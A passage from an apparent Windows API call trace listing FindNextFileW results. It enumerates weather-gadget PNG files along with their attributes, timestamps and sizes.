ftLastWriteTime.dwLowDateTime=0xbdac41dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd68, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn_search_up.png", cAlternateFileName="")) returned 1 [0135.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd1c15db, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd1c15db, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdac41dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd80, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn_search_up_BIDI.png", cAlternateFileName="")) returned 1 [0135.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd259b57, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd259b57, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdb828bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xafe, dwReserved0=0x0, dwReserved1=0x0, cFileName="divider-horizontal.png", cAlternateFileName="")) returned 1 [0135.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27fcb6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd27fcb6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdb828bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xafd, dwReserved0=0x0, dwReserved1=0x0, cFileName="divider-vertical.png", cAlternateFileName="")) returned 1 [0135.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd20d899, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd20d899, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdbceb7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2261, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked-loading.png", cAlternateFileName="")) returned 1 [0135.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcb81c45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcb81c45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdbceb7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x274e, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_cloudy.png", cAlternateFileName="")) returned 1 [0135.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbcdf03, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcbcdf03, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdbf4cdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2685, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_few-showers.png", cAlternateFileName="")) returned 1 [0135.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbcdf03, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcbcdf03, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdbf4cdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2930, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_foggy.png", cAlternateFileName="")) returned 1 [0135.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbf4062, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcbf4062, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdc1ae3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2e6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_hail.png", cAlternateFileName="")) returned 1 [0135.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc1a1c1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcc1a1c1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdc1ae3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-first-quarter.png", cAlternateFileName="")) returned 1 [0135.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc1a1c1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcc1a1c1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdc1ae3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2ace, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-first-quarter_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc40320, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcc40320, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdc40f9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2264, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-full.png", cAlternateFileName="")) returned 1 [0135.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc6647f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcc6647f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdc40f9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b2d, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-full_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc8c5de, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcc8c5de, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdcff67c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x21ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-last-quarter.png", cAlternateFileName="")) returned 1 [0135.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbccb273d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbccb273d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdcff67c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b86, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-last-quarter_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbccb273d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbccb273d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdcff67c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x251a, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-new.png", cAlternateFileName="")) returned 1 [0135.479] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbccd889c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbccd889c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdd257dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2d6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-new_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.479] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbccfe9fb, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbccfe9fb, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdd257dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2334, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-waning-crescent.png", cAlternateFileName="")) returned 1 [0135.479] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcd24b5a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcd24b5a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbddbdd5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2c73, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-waning-crescent_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.479] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcd24b5a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcd24b5a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdde3ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x21bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-waning-gibbous.png", cAlternateFileName="")) returned 1 [0135.480] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcd70e18, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcd70e18, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdde3ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b35, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-waning-gibbous_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.480] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcd70e18, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcd70e18, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde0a01c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x22a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-waxing-crescent.png", cAlternateFileName="")) returned 1 [0135.480] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcd96f77, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcd96f77, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde0a01c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-waxing-crescent_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.481] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcdbd0d6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcdbd0d6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde0a01c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2203, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-waxing-gibbous.png", cAlternateFileName="")) returned 1 [0135.481] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcdbd0d6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcdbd0d6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde0a01c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_moon-waxing-gibbous_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.481] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbce2f4f3, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbce2f4f3, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde3017c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3173, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_rainy.png", cAlternateFileName="")) returned 1 [0135.481] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbce2f4f3, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbce2f4f3, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde3017c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3369, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_snow.png", cAlternateFileName="")) returned 1 [0135.482] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcea1910, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcea1910, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde3017c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2fcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_thunderstorm.png", cAlternateFileName="")) returned 1 [0135.482] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbceedbce, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbceedbce, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde562dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3229, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_black_windy.png", cAlternateFileName="")) returned 1 [0135.482] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf13d2d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcf13d2d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdea259c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x21a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_blue_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.482] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf5ffeb, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcf5ffeb, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdea259c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2ea3, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_blue_snow.png", cAlternateFileName="")) returned 1 [0135.483] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcfac2a9, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcfac2a9, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdec86fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2ce5, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_blue_sun.png", cAlternateFileName="")) returned 1 [0135.483] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcff8567, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcff8567, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdec86fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x32c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_blue_windy.png", cAlternateFileName="")) returned 1 [0135.483] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd01e6c6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd01e6c6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdec86fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2929, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_gray_cloudy.png", cAlternateFileName="")) returned 1 [0135.484] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd044825, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd044825, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdec86fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x29d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_gray_few-showers.png", cAlternateFileName="")) returned 1 [0135.484] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd06a984, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd06a984, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdeee85c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x273c, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_gray_foggy.png", cAlternateFileName="")) returned 1 [0135.484] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd090ae3, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd090ae3, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdeee85c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3071, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_gray_hail.png", cAlternateFileName="")) returned 1 [0135.484] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd090ae3, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd090ae3, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdeee85c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3253, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_gray_rainy.png", cAlternateFileName="")) returned 1 [0135.485] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd0b6c42, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd0b6c42, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdeee85c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x32ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_gray_snow.png", cAlternateFileName="")) returned 1 [0135.485] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd0b6c42, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd0b6c42, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdf149bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x31d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="docked_gray_thunderstorm.png", cAlternateFileName="")) returned 1 [0135.485] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2a5e15, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd2a5e15, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdf149bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0x0, dwReserved1=0x0, cFileName="grayStateIcon.png", cAlternateFileName="")) returned 1 [0135.485] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2a5e15, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd2a5e15, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdf3ab1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x175, dwReserved0=0x0, dwReserved1=0x0, cFileName="greenStateIcon.png", cAlternateFileName="")) returned 1 [0135.486] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc58e56d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc58e56d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdf3ab1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="info.png", cAlternateFileName="")) returned 1 [0135.486] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2a5e15, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd2a5e15, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdf3ab1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x18f, dwReserved0=0x0, dwReserved1=0x0, cFileName="notConnectedStateIcon.png", cAlternateFileName="")) returned 1 [0135.486] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27fcb6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd27fcb6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdf3ab1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x18f, dwReserved0=0x0, dwReserved1=0x0, cFileName="redStateIcon.png", cAlternateFileName="")) returned 1 [0135.487] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd1e773a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd1e773a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdf60c7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="search_background.png", cAlternateFileName="")) returned 1 [0135.487] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2339f8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbd2339f8, ftLastAccessTime.dwHighDateTime=0x1ca0404, 